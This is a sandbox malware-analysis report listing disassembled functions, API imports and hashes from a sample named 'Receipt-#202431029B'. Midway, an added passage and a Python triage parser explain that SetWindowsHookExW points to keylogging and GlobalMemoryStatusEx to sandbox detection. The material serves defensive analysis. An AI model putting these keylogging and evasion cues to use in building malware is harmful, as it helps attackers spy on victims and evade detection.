                                                                  • Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7500000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8fca9f5b4f2b5575f4b8abdeff95e1adbf093ba1e3c1cee22758e45ef10270b3
                                                                  • Instruction ID: b46da832735f768b08716bad4cd72f919302bed761bb0ef8a6dace0acf221fd2
                                                                  • Opcode Fuzzy Hash: 8fca9f5b4f2b5575f4b8abdeff95e1adbf093ba1e3c1cee22758e45ef10270b3
                                                                  • Instruction Fuzzy Hash: 704101B1D043598FCB14DFB9D8046DABBF5AF89320F15896AD408E7281DB749984CBE1
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05376922
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 9fb7b457ed0926977c2e053a2bb660a88c0edd6a121b00a91ed5cbf32146a525
                                                                  • Instruction ID: 28c994500111afe53ad637950f3ca25c3afa1a333901131ef50dca9bfc57bf76
                                                                  • Opcode Fuzzy Hash: 9fb7b457ed0926977c2e053a2bb660a88c0edd6a121b00a91ed5cbf32146a525
                                                                  • Instruction Fuzzy Hash: 0A51BFB1D10309AFDB14CF99C995ADEBBF5FF48310F24852AE819AB210D7759845CF90
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05376922
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CreateWindow
                                                                  • String ID:
                                                                  • API String ID: 716092398-0
                                                                  • Opcode ID: 76466240cad0db002443fd4f3cccc7c81e1eec9c4dee7cd0e16ccf41278cfdbe
                                                                  • Instruction ID: 82f17dbddc79756f99729a5d29abcf9459c5f7de2985afbc06172d3243a427ac
                                                                  • Opcode Fuzzy Hash: 76466240cad0db002443fd4f3cccc7c81e1eec9c4dee7cd0e16ccf41278cfdbe
                                                                  • Instruction Fuzzy Hash: 1651CEB1D103499FDB15CF9AC894ADEBBF5FF88300F24852AE819AB210D7749845CF90
                                                                  APIs
                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 05378EA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: CallProcWindow
                                                                  • String ID:
                                                                  • API String ID: 2714655100-0
                                                                  • Opcode ID: dd95bc21687440e3a4eb8b0b34f888044ffc89cff7a8b4cad27da1e30ab16b05
                                                                  • Instruction ID: 47e58d29f9f1ba567bb613add4490207378f9daec96aa45b63a34a9aa05f6eca
                                                                  • Opcode Fuzzy Hash: dd95bc21687440e3a4eb8b0b34f888044ffc89cff7a8b4cad27da1e30ab16b05
                                                                  • Instruction Fuzzy Hash: 9F4117B9900309CFDB14CF99C488AAAFBF5FF88314F248459E519A7761D778A841CBA0
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139B2B6,?,?,?,?,?), ref: 0139B377
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: 42a73b5d79270fa0775930d94d3bd51e8b162b1243c5a4477fe6e71469f5be6e
                                                                  • Instruction ID: 2d8197c8b4760a32cbedca7eeffcc33a78c5214022b9138982247f74856d9917
                                                                  • Opcode Fuzzy Hash: 42a73b5d79270fa0775930d94d3bd51e8b162b1243c5a4477fe6e71469f5be6e
                                                                  • Instruction Fuzzy Hash: A921E3B5900248AFDB10CF9AD884ADEFBF8EB48314F14841AE918A3350D374A954CFA5
                                                                  APIs
                                                                  • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0139B2B6,?,?,?,?,?), ref: 0139B377
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: DuplicateHandle
                                                                  • String ID:
                                                                  • API String ID: 3793708945-0
                                                                  • Opcode ID: a5cc111a9683ba9a600d8b3990c8074f8710c4a040958695b4ede3c673f4d89b
                                                                  • Instruction ID: f6515d51501566e4f7eae7ef8c1897eecdaab35e7b5844a0cdb803d057355155
                                                                  • Opcode Fuzzy Hash: a5cc111a9683ba9a600d8b3990c8074f8710c4a040958695b4ede3c673f4d89b
                                                                  • Instruction Fuzzy Hash: E621E4B5900308AFDB10CFAAD984ADEFFF4EB48324F14841AE918A3350D374A954CF65
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0537B4AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: d9ff66d97f1a18c3bdcbb78ed5370ef651ebd0711a5ced5c0c131366719f0648
                                                                  • Instruction ID: 135a613f8af2ba12059c73dec03e76ac3553eeae567027a4ff9dcf57ce2eaa64
                                                                  • Opcode Fuzzy Hash: d9ff66d97f1a18c3bdcbb78ed5370ef651ebd0711a5ced5c0c131366719f0648
                                                                  • Instruction Fuzzy Hash: 862163B2C043588FDB21EFADD8447DABBF4EF98321F10844AC059A7251D6389948CBA6
                                                                  APIs
                                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0139773B
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: 73928a007cd8623766e83b3e1583d6a7ad9cfe5e91704d3b5582030e8c1f6cbe
                                                                  • Instruction ID: ee9fe8302289c1e5596a170594f13230b27639183fd2b21fd9c7a656be1d2025
                                                                  • Opcode Fuzzy Hash: 73928a007cd8623766e83b3e1583d6a7ad9cfe5e91704d3b5582030e8c1f6cbe
                                                                  • Instruction Fuzzy Hash: 942149B5D002099FDB14DFA9C844BEEFBF5FB88314F10841AD419A7290C774A945CFA0
                                                                  APIs
                                                                  • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0139773B
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_1390000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HookWindows
                                                                  • String ID:
                                                                  • API String ID: 2559412058-0
                                                                  • Opcode ID: fc096c2c1f362e88c29ba37cc67db9296bf9d152646cb592a8cbb3afe4ed6cca
                                                                  • Instruction ID: f373f5367ccf64ca3e09f4b8995eae4c91a74cbbfe9527b7cf6445396569541a
                                                                  • Opcode Fuzzy Hash: fc096c2c1f362e88c29ba37cc67db9296bf9d152646cb592a8cbb3afe4ed6cca
                                                                  • Instruction Fuzzy Hash: C42124B5D102099FDB14DFAAD844BEEFBF5FB88314F10842AD419A7290CB74A944CFA1
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,075078F2), ref: 075079DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7500000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 7d7dc3224b227dba1be7fa25ad7e6272f3bbb2c7dbf4c846eadb71cda6104383
                                                                  • Instruction ID: 41973baf7dee76275b1d0b984ce3edcc2e62166230ed0489d6da434f68d652d7
                                                                  • Opcode Fuzzy Hash: 7d7dc3224b227dba1be7fa25ad7e6272f3bbb2c7dbf4c846eadb71cda6104383
                                                                  • Instruction Fuzzy Hash: B71103B1C006599BCB10DFAAC445ADEFBF4EB48320F11852AE818B7240D778A954CFA1
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0537BCA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeek
                                                                  • String ID:
                                                                  • API String ID: 2222842502-0
                                                                  • Opcode ID: a9a97094e7d56dd83867a4589bb9cbab50e6efc73c1b44545a36d450c2e2f690
                                                                  • Instruction ID: 42b32213a019567df5de6d9658c2beca5e5f1bdda459ab58c85594d734a522b4
                                                                  • Opcode Fuzzy Hash: a9a97094e7d56dd83867a4589bb9cbab50e6efc73c1b44545a36d450c2e2f690
                                                                  • Instruction Fuzzy Hash: DD21E3B58002099FDB10CF9AD585BEEBBF8FB48310F10842AE559A3651D3789544CFA5
                                                                  APIs
                                                                  • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,075078F2), ref: 075079DF
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_7500000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: GlobalMemoryStatus
                                                                  • String ID:
                                                                  • API String ID: 1890195054-0
                                                                  • Opcode ID: 276660bb35f42b6a35a0df055bcbacdd8a0a7db7eda57f0fa455741ff8e785f4
                                                                  • Instruction ID: 9a3038cb71b865ea1346e46f1ad2776a6de40bc1228c9b3a0dcd8955377adb12
                                                                  • Opcode Fuzzy Hash: 276660bb35f42b6a35a0df055bcbacdd8a0a7db7eda57f0fa455741ff8e785f4
                                                                  • Instruction Fuzzy Hash: 5C11F4B1C006599BCB10DFAAC445ADEFBF4EB48310F11896AD818A7281D778A954CFE1
                                                                  APIs
                                                                  • PeekMessageW.USER32(?,?,?,?,?), ref: 0537BCA0
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: MessagePeek
                                                                  • String ID:
                                                                  • API String ID: 2222842502-0
                                                                  • Opcode ID: 1bfaf8370beb596842eeea08a6a5bc5faa2304e81b6b96ba983763b1b272ce2c
                                                                  • Instruction ID: d0d8dbd2b4c9f39e29ebe1cef0e4a24e4791ef07bd150251a8d357d53b7a4ea8
                                                                  • Opcode Fuzzy Hash: 1bfaf8370beb596842eeea08a6a5bc5faa2304e81b6b96ba983763b1b272ce2c
                                                                  • Instruction Fuzzy Hash: C511F3B5C002499FDB10CF9AD984BDEFBF8FB48320F10842AE958A3251D378A544CFA5
                                                                  APIs
                                                                  • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,053710BC), ref: 053712F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: HandleModule
                                                                  • String ID:
                                                                  • API String ID: 4139908857-0
                                                                  • Opcode ID: a88c9ce5413071b64f07f06c680f33054436682499c915191588df3aee6df4ff
                                                                  • Instruction ID: 01bb6fe6158f1f0c13a42178e355c85b28c89e5f85321dba9466fc4b1201b54f
                                                                  • Opcode Fuzzy Hash: a88c9ce5413071b64f07f06c680f33054436682499c915191588df3aee6df4ff
                                                                  • Instruction Fuzzy Hash: 9A11F0B6C007498FDB20DF9AC448ADEFBF9EB88310F10845AD429B7600D779A545CFA5
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,05376A40,?,?,?,?), ref: 05376AB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID:
                                                                  • API String ID: 1378638983-0
                                                                  • Opcode ID: 6a2b1db489c8aec85063c585a3b7c6be3b701c63f5b3f3c96b0fd56480ee9411
                                                                  • Instruction ID: 9eb82cc52b48643934cac1d9b9adcbf5e66de89abc4bccd8f8f58b8e24405d72
                                                                  • Opcode Fuzzy Hash: 6a2b1db489c8aec85063c585a3b7c6be3b701c63f5b3f3c96b0fd56480ee9411
                                                                  • Instruction Fuzzy Hash: 7611F5B58007489FDB20DF9AD589B9EBBF8EB48320F208419D919A7741C379A944CFA5
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0537B4AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: 95a98fdce8b2c20326ec44eab92ec15a7c2274ad735446d96474ef26f7969a9c
                                                                  • Instruction ID: 07bfc7b09604a3423f946ef8f2789ab3a2e99fda54739fda45248d6fe694944c
                                                                  • Opcode Fuzzy Hash: 95a98fdce8b2c20326ec44eab92ec15a7c2274ad735446d96474ef26f7969a9c
                                                                  • Instruction Fuzzy Hash: E21115B5C007488FDB20DF9AD449B9EFBF8EB48324F108459D519A7200D778A944CFA5
                                                                  APIs
                                                                  • SetWindowLongW.USER32(?,?,?,?,?,?,?,?,05376A40,?,?,?,?), ref: 05376AB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: LongWindow
                                                                  • String ID:
                                                                  • API String ID: 1378638983-0
                                                                  • Opcode ID: d19d8b25e2e50368c45a7f5d3485a420ff8519b0db185c8d8a458113e3a39cf3
                                                                  • Instruction ID: b97d77d909e22aef228023b30ff165646f39d2030c63b05a51c6636f303e2272
                                                                  • Opcode Fuzzy Hash: d19d8b25e2e50368c45a7f5d3485a420ff8519b0db185c8d8a458113e3a39cf3
                                                                  • Instruction Fuzzy Hash: 6E1136B58007089FDB10CF99C585BDEBBF8EB48320F208509D919A3340C379A944CFA1
                                                                  APIs
                                                                  • OleInitialize.OLE32(00000000), ref: 0537B4AD
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4106947630.0000000005370000.00000040.00000800.00020000.00000000.sdmp, Offset: 05370000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_5370000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID: Initialize
                                                                  • String ID:
                                                                  • API String ID: 2538663250-0
                                                                  • Opcode ID: 1cf5d206315600d9bd1352575789666ecfabe4cdf2946f3320ea760f69315e76
                                                                  • Instruction ID: b45685b4bf87c3eb65a32a182376d9768bf12a16c000b3105687bca6a8b4cdab
                                                                  • Opcode Fuzzy Hash: 1cf5d206315600d9bd1352575789666ecfabe4cdf2946f3320ea760f69315e76
                                                                  • Instruction Fuzzy Hash: 151130B5C003488FCB20DFA9C549BDEBBF4EB48320F20885AD519A3210D379A944CFA0
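The blocks above are raw IDA-plugin output, one per disassembled function: the resolved imports, the memory-dump region the function was carved from, and fingerprints (Opcode ID, Instruction Fuzzy Hash) for similarity matching. What an analyst usually wants from them is a triage view: which dumped region contains which capability, and how many distinct functions (by Opcode ID) call each API. The parser below is an added example written for this page, not a Joe Sandbox feature or code from the sample. Its input is an excerpt of the blocks above copied verbatim (bullets not needed for the demonstration are left out), and the API_NOTES mapping is an analyst heuristic assumed here, not a statement the report makes; in particular the report shows only "?" arguments, so the hook type passed to SetWindowsHookExW cannot be confirmed from this listing alone.

```python
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Excerpt of the function blocks listed above (values copied from this report). The Snapshot
# File, String ID, API String ID, Instruction ID and Opcode Fuzzy Hash bullets are omitted
# here; the parser treats them like any other "key: value" bullet.
SAMPLE = """
APIs
• SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0139773B
Memory Dump Source
• Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
Joe Sandbox IDA Plugin
Similarity
• API ID: HookWindows
• Opcode ID: 73928a007cd8623766e83b3e1583d6a7ad9cfe5e91704d3b5582030e8c1f6cbe
• Instruction Fuzzy Hash: 942149B5D002099FDB14DFA9C844BEEFBF5FB88314F10841AD419A7290C774A945CFA0
APIs
• SetWindowsHookExW.USER32(?,00000000,?,?), ref: 0139773B
Memory Dump Source
• Source File: 00000008.00000002.4102033463.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
Similarity
• API ID: HookWindows
• Opcode ID: fc096c2c1f362e88c29ba37cc67db9296bf9d152646cb592a8cbb3afe4ed6cca
• Instruction Fuzzy Hash: C42124B5D102099FDB14DFAAD844BEEFBF5FB88314F10842AD419A7290CB74A944CFA1
APIs
• GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,075078F2), ref: 075079DF
Memory Dump Source
• Source File: 00000008.00000002.4108912612.0000000007500000.00000040.00000800.00020000.00000000.sdmp, Offset: 07500000, based on PE: false
Similarity
• API ID: GlobalMemoryStatus
• Opcode ID: 7d7dc3224b227dba1be7fa25ad7e6272f3bbb2c7dbf4c846eadb71cda6104383
• Instruction Fuzzy Hash: B71103B1C006599BCB10DFAAC445ADEFBF4EB48320F11852AE818B7240D778A954CFA1
Memory Dump Source
• Source File: 00000008.00000002.4100514357.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
Similarity
• API ID:
• Opcode ID: f2f9057efbdcd10dd0cab5031caccac30f3d5e8845b5ae0337be16e41b50eee7
• Instruction Fuzzy Hash: BF2133B1504200EFDF09DF58E9C4B66BFA5FBD4324F60C569E90A0B64AC336E456C7A2
"""

API_LINE = re.compile(r"^•\s*(?P<name>\w+)\.(?P<module>[\w.]+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
KV_LINE = re.compile(r"^•\s*(?P<key>[^:]+):\s*(?P<value>.*)$")
OFFSET = re.compile(r"Offset:\s*([0-9A-Fa-f]+)")

@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (api name, module, call-site address)
    region: str = ""                            # base address of the memory dump the function lives in
    fields: dict = field(default_factory=dict)  # the remaining "key: value" bullets

def parse_report(text):
    """Split the 'APIs / Memory Dump Source / Similarity' blocks into FunctionRecords."""
    records, cur, in_apis = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":                       # a function with resolved imports starts here
            cur, in_apis = FunctionRecord(), True
            records.append(cur)
        elif line == "Memory Dump Source":       # a function without imports starts here
            if cur is None or "Source File" in cur.fields:
                cur = FunctionRecord()
                records.append(cur)
            in_apis = False
        elif cur is not None and line.startswith("•"):
            if in_apis:
                m = API_LINE.match(line)
                if m:
                    cur.apis.append((m["name"], m["module"], m["ref"]))
            elif (m := KV_LINE.match(line)):
                key, value = m["key"].strip(), m["value"].strip()
                cur.fields[key] = value
                if key == "Source File":
                    off = OFFSET.search(value)
                    cur.region = off.group(1).upper() if off else ""
    return records

# Analyst heuristic (an assumption for this example, not part of the report): what these imports
# usually mean in a sample with this report's signature set.
API_NOTES = {
    "SetWindowsHookExW": "installs a Windows hook; with WH_KEYBOARD(_LL) this is the usual user-mode keylogger primitive",
    "GlobalMemoryStatusEx": "queries physical RAM size; a small value is a common sandbox/VM check",
    "PeekMessageW": "non-blocking message pump, needed for a hook callback to be serviced",
}

def index_by_region(records):
    """region -> api -> set of Opcode IDs (one Opcode ID per distinct function)."""
    idx = defaultdict(lambda: defaultdict(set))
    for r in records:
        for name, _module, _ref in r.apis:
            idx[r.region][name].add(r.fields.get("Opcode ID", ""))
    return idx

def apis_per_region(records):
    return {region: sorted(apis) for region, apis in index_by_region(records).items()}

def distinct_functions_per_api(records):
    """Number of distinct functions (by Opcode ID) calling each API, across all regions."""
    ids = defaultdict(set)
    for apis in index_by_region(records).values():
        for name, opcodes in apis.items():
            ids[name] |= opcodes
    return {name: len(s) for name, s in ids.items()}

def triage(records):
    """(region, api, distinct-function count, note) for the APIs an analyst should look at first."""
    return [(region, name, len(ops), API_NOTES[name])
            for region, apis in sorted(index_by_region(records).items())
            for name, ops in sorted(apis.items()) if name in API_NOTES]

if __name__ == "__main__":
    recs = parse_report(SAMPLE)
    print(f"{len(recs)} functions, {sum(1 for r in recs if not r.apis)} without resolved imports")
    for region, api, n, note in triage(recs):
        print(f"{region}  {api:<22}{n} function(s)  {note}")
```

Run against the excerpt this reports two distinct SetWindowsHookExW callers in the 0x01390000 region (the two blocks above with different Opcode IDs but near-identical Instruction Fuzzy Hashes, i.e. the same routine recovered twice) and one GlobalMemoryStatusEx caller in the 0x07500000 region, which is the kind of split an analyst uses to decide which dump to load into a disassembler first. Feeding the full section instead of the excerpt needs no code change.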
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100514357.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_113d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f2f9057efbdcd10dd0cab5031caccac30f3d5e8845b5ae0337be16e41b50eee7
                                                                  • Instruction ID: f3166c299b1427164be9d700afaad98665e944badd23a51f2b5e9162fa640bcd
                                                                  • Opcode Fuzzy Hash: f2f9057efbdcd10dd0cab5031caccac30f3d5e8845b5ae0337be16e41b50eee7
                                                                  • Instruction Fuzzy Hash: BF2133B1504200EFDF09DF58E9C4B66BFA5FBD4324F60C569E90A0B64AC336E456C7A2
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5f1874c587b76be5dc2fbb2cfbec0d60a8076a00d2280d8e12a26aef75442500
                                                                  • Instruction ID: 19767d0eea6c44a13c884c56f583b23fddafa4f4b3c2873598f679c622abab5a
                                                                  • Opcode Fuzzy Hash: 5f1874c587b76be5dc2fbb2cfbec0d60a8076a00d2280d8e12a26aef75442500
                                                                  • Instruction Fuzzy Hash: 902107B5608204DFDF09DF58E5C4B25BBA5FB94724F24C56DE80A4B342C336D806CB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c6b393682a12240aea740cd8d8b94d3c027d85ccd96ff05eee353b639c61f95b
                                                                  • Instruction ID: 7dcfd65eced0c5145ed1552e4b48e25ea47910e10fb4045ac12492442a265869
                                                                  • Opcode Fuzzy Hash: c6b393682a12240aea740cd8d8b94d3c027d85ccd96ff05eee353b639c61f95b
                                                                  • Instruction Fuzzy Hash: 1421F5B56042049FDF09DF58E9C4B26BBA5FB98B14F24C96DDC0A4B352C336D846CB62
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1c2c551a29f0eb761936b2a67d8abd7a4b3458ac565fe3e6b31e787eeffc58a2
                                                                  • Instruction ID: 864212ce678047269c1a580803176e253c1efeca85808201bc3e6c3bf198778b
                                                                  • Opcode Fuzzy Hash: 1c2c551a29f0eb761936b2a67d8abd7a4b3458ac565fe3e6b31e787eeffc58a2
                                                                  • Instruction Fuzzy Hash: A821D071604300DFDF19DF68E984B26BBA5EBA4B54F20C66DD90A4B352C336D846C662
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d0890deff214d42c8c5aa1187cdecc14d2ba6b0038d87376efc1a1ecf4851114
                                                                  • Instruction ID: 9d1beb7bd732891a2c282aaeb28a2a4cf559f73e4b515bffe8118933f1342a33
                                                                  • Opcode Fuzzy Hash: d0890deff214d42c8c5aa1187cdecc14d2ba6b0038d87376efc1a1ecf4851114
                                                                  • Instruction Fuzzy Hash: 9A21D4715083808FCB07CF24D984711BF71EB56614F24C1EAD8498B2A3C33A9846C762
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100514357.000000000113D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0113D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_113d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                  • Instruction ID: 347e738bf76819cfaa29082a12ad5be229d213a6b12cfa705a73e19080fc343e
                                                                  • Opcode Fuzzy Hash: 3d7739f24a7f613363dc0741c1dd4920fb0d2c4cd1d09143030fc2081c46ff73
                                                                  • Instruction Fuzzy Hash: 7B11CD76504280DFDF16CF54E5C4B56BF72FB84224F24C5A9D8090B65AC336D45ACBA1
                                                                  Memory Dump Source
                                                                  • Source File: 00000008.00000002.4100649557.000000000114D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0114D000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_8_2_114d000_Receipt-#202431029B.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5bc96cb8dbab4a459d35c79ebbe5ba2a9dff6c5f08df11ade35b896c854f64ae
                                                                  • Instruction ID: dfbab088f33d953a9f7569ab8d8bd8003a6e8602cb04fe3cfd12f8df0d8ccc4b
